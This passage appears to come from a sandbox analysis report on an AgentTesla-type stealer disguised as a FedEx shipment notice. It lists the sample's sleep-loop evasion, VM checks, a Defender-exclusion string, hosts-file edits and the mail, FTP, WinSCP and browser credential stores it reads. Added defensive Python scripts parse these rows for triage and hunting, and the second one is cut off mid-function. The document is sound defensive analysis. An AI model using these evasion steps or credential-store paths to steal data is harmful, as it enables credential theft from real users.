                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488 | Thread sleep time: -238453s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488 | Thread sleep time: -238344s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488 | Thread sleep time: -238063s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488 | Thread sleep time: -237313s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488 | Thread sleep time: -237063s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488 | Thread sleep time: -236313s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488 | Thread sleep time: -236171s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488 | Thread sleep time: -236060s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488 | Thread sleep time: -235953s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 5320 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1632 | Thread sleep time: -15679732462653109s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1004 | Thread sleep count: 8137 > 30
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1004 | Thread sleep count: 1718 > 30
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Thread delayed: delay time: 240000
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Thread delayed: delay time: 239889
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Thread delayed: delay time: 239781
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Thread delayed: delay time: 239671
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Thread delayed: delay time: 239543
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Thread delayed: delay time: 239420
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Thread delayed: delay time: 239309
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Thread delayed: delay time: 239195
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Thread delayed: delay time: 239063
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Thread delayed: delay time: 238937
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Thread delayed: delay time: 238813
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Thread delayed: delay time: 238671
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Thread delayed: delay time: 238562
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Thread delayed: delay time: 238453
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Thread delayed: delay time: 238344
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Thread delayed: delay time: 238063
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Thread delayed: delay time: 237313
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Thread delayed: delay time: 237063
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Thread delayed: delay time: 236313
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Thread delayed: delay time: 236171
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Thread delayed: delay time: 236060
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Thread delayed: delay time: 235953
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Window / User API: threadDelayed 1650
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Window / User API: threadDelayed 439
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Window / User API: threadDelayed 8137
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Window / User API: threadDelayed 1718
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 240000
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 239889
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 40928
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 239781
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 239671
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 239543
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 239420
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 239309
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 239195
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 239063
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 238937
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 238813
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 238671
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 238562
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 238453
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 238344
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 238063
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 237313
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 237063
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 236313
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 236171
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 236060
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 235953
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeThread delayed: delay time: 922337203685477
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.261127000.0000000002EA1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.261127000.0000000002EA1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.261127000.0000000002EA1000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.518000564.00000000015B3000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.261127000.0000000002EA1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeCode function: 1_2_0133E330 LdrInitializeThunk,
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeMemory allocated: page read and write | page guard
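The "Thread delayed" rows above are worth reading as a sequence rather than as individual events. The second process requests 240000 ms, then 239889, 239781, 239671 and so on down to 235953, each value about 110 ms smaller than the last; the value 922337203685477 at both ends is TimeSpan.MaxValue expressed in milliseconds, that is, an open-ended wait. A shrinking series like this is what a loop of the form sleep(deadline - now) produces when every sleep returns early: the requested delay tracks the wall clock instead of being a constant, which is the usual way .NET stealers defeat a sandbox that shortens individual sleeps. The script below is an added example, not part of the Joe Sandbox report or of the sample: it parses rows in the report's format and reduces them to the wait the loop was aiming for, how many times it re-armed, and how much time it actually got. REPORT_SNIPPET abbreviates the executable path, and the step threshold and run length are assumptions tuned to this listing.

```python
import re

# Constructed sample: rows copied from this report, with the long executable
# path shortened to "<sample>.exe" for readability.
REPORT_SNIPPET = """\
Source: <sample>.exe | Thread delayed: delay time: 922337203685477
Source: <sample>.exe | Thread delayed: delay time: 240000
Source: <sample>.exe | Thread delayed: delay time: 239889
Source: <sample>.exe | Window / User API: threadDelayed 1650
"""

# All 26 "Thread delayed" values of the second process, in report order.
DELAYS = [
    922337203685477, 240000, 239889, 40928, 239781, 239671, 239543, 239420,
    239309, 239195, 239063, 238937, 238813, 238671, 238562, 238453, 238344,
    238063, 237313, 237063, 236313, 236171, 236060, 235953,
    922337203685477, 922337203685477,
]

DELAY_RE = re.compile(r"Thread delayed: delay time: (\d+)")
# int(TimeSpan.MaxValue.TotalMilliseconds) in .NET: an effectively infinite wait.
TIMESPAN_MAX_MS = 922337203685477


def parse_delays(report_text):
    """Extract the requested delays (ms) from 'Thread delayed' rows, in order."""
    return [int(m.group(1)) for m in DELAY_RE.finditer(report_text)]


def countdown_runs(delays, max_step_ms=2000, min_len=3):
    """Group consecutive delays that shrink by a small amount each time.

    A run like 240000, 239889, 239781, ... is what sleep(deadline - now)
    produces when each sleep returns early. One interleaved value from
    another thread (40928 in this report) is tolerated without breaking
    the run. The step threshold is an assumption tuned to this report.
    """
    runs, cur = [], []
    for i, d in enumerate(delays):
        if cur and 0 < cur[-1] - d <= max_step_ms:
            cur.append(d)
        elif cur and i + 1 < len(delays) and 0 < cur[-1] - delays[i + 1] <= max_step_ms:
            continue  # single outlier; keep the current run open
        else:
            if len(cur) >= min_len:
                runs.append(cur)
            cur = [d]
    if len(cur) >= min_len:
        runs.append(cur)
    return runs


def summarize_delays(delays):
    """Reduce a delay list to what an analyst wants to know about the wait logic."""
    return {
        "infinite_waits": sum(1 for d in delays if d >= TIMESPAN_MAX_MS),
        "countdown_runs": [
            {
                "requested_ms": run[0],          # the wait the loop was aiming for
                "samples": len(run),             # how many times it re-armed
                "elapsed_ms": run[0] - run[-1],  # wall-clock time it actually got
            }
            for run in countdown_runs(delays)
        ],
    }


if __name__ == "__main__":
    print(parse_delays(REPORT_SNIPPET))
    print(summarize_delays(DELAYS))
```

For this listing the summary reports one countdown run: a requested wait of 240000 ms, re-armed 22 times, of which only about 4 seconds elapsed before the process moved on. That is the reading to put in a triage note: the sample intended to idle for four minutes before doing anything observable, and the sandbox's sleep handling, not the sample's logic, is why the behaviour appeared within the analysis window.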

                      HIPS / PFW / Operating System Protection Evasion:

                      Modifies the hosts file
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | File written: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Process created: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.518645753.0000000001B00000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.518645753.0000000001B00000.00000002.00020000.sdmp | Binary or memory string: Progman
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.518645753.0000000001B00000.00000002.00020000.sdmp | Binary or memory string: SProgram Managerl
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.518645753.0000000001B00000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd,
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.518645753.0000000001B00000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Queries volume information: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe VolumeInformation
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Linq.dll VolumeInformation
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Queries volume information: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe VolumeInformation
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Lowering of HIPS / PFW / Operating System Security Settings:

                      Modifies the hosts file
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | File written: C:\Windows\System32\drivers\etc\hosts

                      Stealing of Sensitive Information:

                      Yara detected Telegram RAT
                      Source: Yara match | File source: 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe PID: 5244, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe PID: 5604, type: MEMORYSTR
                      Yara detected AgentTesla
                      Source: Yara match | File source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.3fda280.4.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.12.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.2.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.10.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.3fa3860.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.3fda280.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.3fa3860.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000001.00000000.258283858.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000001.00000000.256875551.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000001.00000000.257251923.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000001.00000000.257782427.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000001.00000002.514650311.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.263619418.0000000003EAD000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe PID: 5244, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe PID: 5604, type: MEMORYSTR
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal ftp login credentials
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: Yara match | File source: 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe PID: 5604, type: MEMORYSTR
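The four credential-theft signatures above are, in the end, a list of nine artifact paths: mail client profile files and registry hives (Thunderbird, Outlook, IncrediMail), a WinSCP session store, FTP client bookmarks (FileZilla, SmartFTP) and browser credential databases (Chrome, Firefox). Those paths are the reusable part of the report for detection and scoping: an EDR file- or registry-access telemetry search for the same artifacts from an unexpected process finds other stealers of this family, and the sandbox-specific user name only needs to be generalised. The script below is an added example, not part of the Joe Sandbox report or of the sample: it parses rows in the report's "File opened" / "Key opened" format, maps each artifact to the application, credential category and ATT&CK technique, and rewrites the path into a hunting pattern. The rule list, category names and the benign notes.txt row are assumptions made for the demonstration.

```python
import re

# Constructed sample: the "File opened" / "Key opened" rows from this report's
# credential-theft signatures, plus one benign row (Desktop\notes.txt) added
# to show a non-match. The "Source: <sample>.exe | " prefix is abbreviated.
REPORT_ROWS = r"""
Source: <sample>.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: <sample>.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: <sample>.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: <sample>.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: <sample>.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: <sample>.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
Source: <sample>.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: <sample>.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: <sample>.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: <sample>.exe | File opened: C:\Users\user\Desktop\notes.txt
"""

ROW_RE = re.compile(r"\| (File opened|Key opened): (.+)$")

# (regex on the artifact, application, credential category, ATT&CK technique).
# Registry-backed stores map to T1552.002, files to T1552.001, browser
# databases to T1555.003. The list is an assumption; extend it per campaign.
RULES = [
    (r"\\Thunderbird\\profiles\.ini$", "Thunderbird", "mail", "T1552.001"),
    (r"\\Windows Messaging Subsystem\\Profiles\\", "Outlook", "mail", "T1552.002"),
    (r"\\IncrediMail\\Identities$", "IncrediMail", "mail", "T1552.002"),
    (r"\\WinSCP 2\\Sessions$", "WinSCP", "remote-access", "T1552.002"),
    (r"\\FileZilla\\recentservers\.xml$", "FileZilla", "ftp", "T1552.001"),
    (r"\\SmartFTP\\Client 2\.0\\Favorites\\", "SmartFTP", "ftp", "T1552.001"),
    (r"\\Google\\Chrome\\User Data\\.*\\(Login Data|Cookies)$", "Chrome", "browser", "T1555.003"),
    (r"\\Mozilla\\Firefox\\profiles\.ini$", "Firefox", "browser", "T1555.003"),
]


def normalize(artifact):
    """Turn a sandbox-specific path into a reusable hunting pattern."""
    a = re.sub(r"^C:\\Users\\[^\\]+\\", r"%USERPROFILE%\\", artifact, flags=re.I)
    a = re.sub(r"^HKEY_CURRENT_USER\\", r"HKCU\\", a)
    return a


def classify(report_text):
    """Map each credential-store access row to app, category and technique."""
    hits = []
    for line in report_text.splitlines():
        m = ROW_RE.search(line)
        if not m:
            continue
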